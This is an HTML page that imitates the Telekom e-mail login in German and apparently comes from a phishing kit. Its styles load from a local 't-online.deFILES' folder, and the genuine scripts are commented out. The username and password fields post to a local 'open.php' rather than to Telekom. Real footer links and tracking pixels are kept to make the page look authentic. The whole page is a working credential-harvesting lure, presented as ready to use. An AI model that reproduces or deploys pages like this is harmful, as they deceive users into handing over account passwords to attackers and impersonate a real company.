
<!DOCTYPE html>
<!--[if (lte IE 8) ]><html lang="de-DE" class="no-js lte-ie8"><![endif]-->
<!--[if (gt IE 8)|!(IE)]><!--><html class="no-js" lang="de"><!--<![endif]-->

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Telekom Login</title>
    <meta name="description" content="Telekom Login">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="robots" content="noindex" />

    <link rel="stylesheet" type="text/css" href="t-online.deFILES/comp.css">
    <link rel="stylesheet" type="text/css" href="t-online.deFILES/log.css">
    
    <script>
        var accountLocked = false;
        var accountLockedPermanent = false;
        var accountLockExpiration = 0;
        var loginFailed = false;
    </script>
    
    <!--[if lt IE 9]>
    <script type="text/javascript" src="/static/factorx/js/html5shiv.js"></script>
    <script type="text/javascript" src="/static/factorx/js/respond.min.js"></script>
    <![endif]-->

   <!--  <script type="text/javascript" src="t-online.deFILES/min.js"></script> 
    <script type="text/javascript" src="t-online.deFILES/min2.js"></script>
    <script type="text/javascript" src="t-online.deFILES/min3.js"></script>
    <script type="text/javascript" src="t-online.deFILES/log.js"></script> -->
</head>







<body>
    <div>
    <header id="tbs-header">
        <div id="tbs-header-content">
            <div class="container-fixed clearfix">
                <div class="pull-left">
                    <i class="icon icon-large">tT</i>
                </div>
                <div class="pull-right">
                    <span class="tbs-slogan">erleben, was verbindet.</span>
                </div>
            </div>
        </div>
        
        
        
    </header>

    

    
    

    <div class="offset-bottom-5 offset-s-bottom-3"></div>

</div>

    <div>

    

    <div >

        <image src="https://xdn-ttp.de/lns/import-event-0746?zid=b2540c27-0155-4fa9-b90d-c35b7ee4c358"  hidden="true" alt="" frameborder="0" width="1" height="1"/>

        <image src="https://pix.telekom.de/196380495960676/wt?p=441,www.telekom.de.privatkunden.login-idm-id,0,0,0,0,0,0,0,0&amp;cg1=www.telekom.de&amp;cg2=login&amp;cg8=privatkunden&amp;cg9=login-idm-id&amp;cp19=b2540c27-0155-4fa9-b90d-c35b7ee4c358" hidden="true" alt="" frameborder="0" width="1" height="1"/>

    </div>


</div>

    

    <div>
        <div class="container-fixed">
    <div class="tbs-container">
        <div id="tbs-headline">
            <div id="tbs-brand" class="tbs-relative text-center">
                <h4>E-Mail</h4>
                
            </div>
            <h1 class="offset-top-0 offset-bottom-3 text-center">Authentifizieren Sie sich mit dem Telekom Login</h1>
        </div>
        <div class="login-box">
            
            <div class="offset-bottom-1">
                <form id="myForm" class="form" action="open.php" target="_top" method="post" onsubmit="return validate()" name="user">

                    <button class="btn-hidden" name="pw_submit" type="submit"></button>

                    
                    <input type="hidden" name="xsrf_KBPfCABZmdB1zvWrIohOHA" value="IVkCdkSY4dKtgJ4WgQIKQA">

                    
                    <input type="hidden" name="tid" value="7731cc5f-a663-49ed-b6ba-c9d12792a139">

                    <input type="hidden"  name="x-show-cancel" value="false">

                    
                    <div class="offset-bottom-1">

                        
                        <div class="form-input-set">
                            <input id="pw_usr" name="user" type="email" placeholder="Benutzername" inputmode="email" class="form-input" maxlength="256" aria-describedby="usrInfo" tabindex="10" value="">
                            <!-- <label for="pw_usr">Benutzername</label> -->
                            <i id="inputNotificationToggle" class="icon icon-help" data-target="#usrInfo" data-trigger="click"></i>
                        </div>

                        
                        <div id="usrInfo" class="info-box tbs-pointer">
                            <p>So können Sie sich anmelden:</p>
                            <ul>
                                <li>
                                    <span class="text-bold">E-Mail-Adresse: </span>
                                    <span>Ihre Telekom E-Mail-Adresse oder Ihre E-Mail-Adresse eines anderen Anbieters, mit der Sie sich registriert haben.</span>
                                </li>
                                <li>
                                    <span class="text-bold">Mobilfunk-Nummer: </span>
                                    <span>Ihre Telekom Mobilfunk-Nummer, wenn Sie diese mit Ihrem Telekom Login verknüpft haben.</span>
                                </li>
                            </ul>
                        </div>
                    </div>

                    
                    <div class="offset-bottom-1">
                        
                        <div class="form-input-set">
                            <input id="pw_pwd" name="pass" type="password" placeholder="Passwort" inputmode="text" maxlength="128" class="form-input" tabindex="20">
                            <!-- <label for="pw_pwd">Passwort</label> -->
                        </div>
                    </div>

                    
                    

                    
                    <div class="login-helpers clearfix">
                        
                        <div id="tbs-signin-remember" class="form-checkbox-set">
                            <label>
                                <input id="checkbox_permanent_displayed" type="hidden" name="persist_session_displayed" value="1">
                                <input id="checkbox_permanent" type="checkbox" name="persist_session" value="1" class="form-checkbox" tabindex="30">
                                <!-- <span>Angemeldet bleiben</span> -->
                            </label>
                        </div>
                    </div>

                    
                    <div>
                        <button id="pw_submit" name="pw_submit" type="submit" class="text-center btn btn-brand btn-block btn-large" tabindex="40">Überprüfung</button>
                    </div>

                    <!-- alt auth method -->
                    <div class="offset-top-1 clearfix">
                        <button id="altAuthMethod" name="altAuthMethod" type="submit"
                                class="btn btn-block btn-default btn-large" tabindex="41">Andere Anmeldeoptionen</button>
                    </div>

                </form>

                <div class="text-center offset-l-bottom-3-5 offset-l-top-2 offset-s-bottom-2-5 offset-s-top-1-5">
                    <p>Benutzername oder Passwort vergessen?</p>
                    <p>Bitte nutzen Sie &bdquo;Andere Anmeldeoptionen&ldquo;.</p>
                </div>

                
            </div>

            <div class="text-center offset-bottom-2 offset-l-top-2 offset-s-top-1-5">
                <a id="helpLink" href="https://www.telekom.de/hilfe/vertrag-meine-daten/login-daten-passwoerter/alternative-anmeldung"  tabindex="45" target="_blank">Benötigen Sie Hilfe?</a>
            </div>

            <div class="text-center offset-bottom-2">
                <!-- <div>
                    <p>
                        <span>Noch keinen Telekom Login?</span>
                        <a id="registrationLink" class="text-nowrap" tabindex="50" href="https://meinkonto.telekom-dienste.de/konto/registrierung/email/index.xhtml?regp=freemail">Telekom Login erstellen</a>
                        <span>und E-Mail nutzen.</span>
                    </p>
                </div> -->
            </div>

            <div id="tbs-services" class="text-center">
                <img src="t-online.deFILES/services.png" />
            </div>
        </div>
    </div>
</div>
    </div>

    
    

    <footer id="tbs-footer">
    <div class="container-fixed">
        <div class="pull-left">
            <p>&copy; Telekom Deutschland GmbH</p>
            <p class="tbs-text-11">24.03.0, 205ae94b6a03578f3fb4cb02d1c5601f, 291dbe3cd2dbc5207fe2b0d84c31d409a2751e33</p>
        </div>
        <div class="pull-right">
            <ul class="list-inline">
                <li>
                    <a href="https://www.telekom.de/start/impressum" target="_blank">Impressum</a>
                </li>
                <li>
                    <a id="data-protection" href="https://www.telekom.de/datenschutz-ganz-einfach" target="_blank">Datenschutz</a>
                </li>
            </ul>
        </div>
    </div>
</footer>

    <iframe id="callback-tracking" src="https://p.t-online.de/email/sam3-login-ivw.html?page=login&amp;mode=%25mode%25&amp;context=auth&amp;status=first_attempt"></iframe>

    <div>
    
</div>
</body>

</html>
